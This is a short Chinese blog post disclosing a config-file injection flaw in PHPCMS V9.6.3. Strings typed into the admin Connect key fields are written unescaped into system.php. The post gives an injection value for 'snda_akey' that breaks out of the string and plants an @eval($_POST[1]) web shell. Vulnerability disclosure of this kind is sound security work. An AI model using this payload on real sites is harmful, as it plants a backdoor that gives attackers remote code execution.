关于PHPCMSV9
phpcms是一个优秀的php网站管理系统,php内容管理系统,php新闻系统,php新闻发布系统,php文章系统,php文章管理系统。
那么今天我在看看PHPCMS有没有更新的时候,主站已经无法访问了。
环境
LOCALHOST
PHPSTUDY NGINX PHP5.3 mysql5.5
源码在源码之家下载的phpcmsV9.6.3 utf8
漏洞披露
进入后台->基本设置->connect
以上不管是哪一个KEY设置的地方均可以写入任意的字符到配置文件中
找到\www\phpcms\caches\configs\system.php
'connect_enable' => '1', //是否开启外部通行证 'sina_akey' => '', //sina AKEY 'sina_skey' => '', //sina SKEY 'snda_akey' => '', //盛大通行证 akey 'snda_skey' => '', //盛大通行证 skey 'qq_akey' => '', //qq skey 'qq_skey' => '', //qq skey 'qq_appkey' => '', //QQ号码登录 appkey 'qq_appid' => '', //QQ号码登录 appid 'qq_callback' => '', //QQ号码登录 callback 'admin_url' => '', //允许访问后台的域名
闭合
'snda_akey' => '\\',@@eval($_POST[1]),//', //盛大通行证 akey
本文作者为lufei,转载请注明。
